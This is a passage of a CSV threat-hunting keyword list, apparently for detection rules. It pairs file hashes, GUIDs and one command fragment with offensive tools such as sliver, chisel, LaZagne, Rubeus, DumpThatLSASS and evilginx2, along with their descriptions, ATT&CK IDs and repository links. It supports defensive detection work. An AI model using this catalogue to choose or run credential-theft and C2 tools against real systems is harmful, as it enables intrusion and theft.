fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27*",".{0,1000}635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63688c4f211155c76f2948ba21ebaf83*",".{0,1000}63688c4f211155c76f2948ba21ebaf83.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009*",".{0,1000}636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166*",".{0,1000}63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b*",".{0,1000}63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362*",".{0,1000}638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*639EF517-FCFC-408E-9500-71F0DC0458DB*",".{0,1000}639EF517\-FCFC\-408E\-9500\-71F0DC0458DB.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940*",".{0,1000}63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f*",".{0,1000}63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713*",".{0,1000}63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123*",".{0,1000}63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6*",".{0,1000}63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*-64 -format=reflective-dll *",".{0,1000}\-64\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f*",".{0,1000}6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - 
T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f*",".{0,1000}641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a*",".{0,1000}64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5*",".{0,1000}643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*644758B1-C146-4D3B-B614-8EB6C933B0AA*",".{0,1000}644758B1\-C146\-4D3B\-B614\-8EB6C933B0AA.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8*",".{0,1000}6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*644AFE4A-2267-4DF9-A79D-B514FB31830E*",".{0,1000}644AFE4A\-2267\-4DF9\-A79D\-B514FB31830E.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de*",".{0,1000}64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99*",".{0,1000}64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*64D84D51-F462-4A24-85EA-845C97238C09*",".{0,1000}64D84D51\-F462\-4A24\-85EA\-845C97238C09.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" 
"*64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310*",".{0,1000}64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24*",".{0,1000}64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e*",".{0,1000}651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d*",".{0,1000}6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115*",".{0,1000}6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - 
T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936*",".{0,1000}6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1","10","10","N/A","N/A","N/A","N/A" "*6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395*",".{0,1000}6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6563686f2048656c6c6f204261636b646f6f72*",".{0,1000}6563686f2048656c6c6f204261636b646f6f72.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632*",".{0,1000}65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1*",".{0,1000}65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9*",".{0,1000}6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474*",".{0,1000}65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b*",".{0,1000}65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd*",".{0,1000}65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330*",".{0,1000}65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8*",".{0,1000}6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba*",".{0,1000}6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
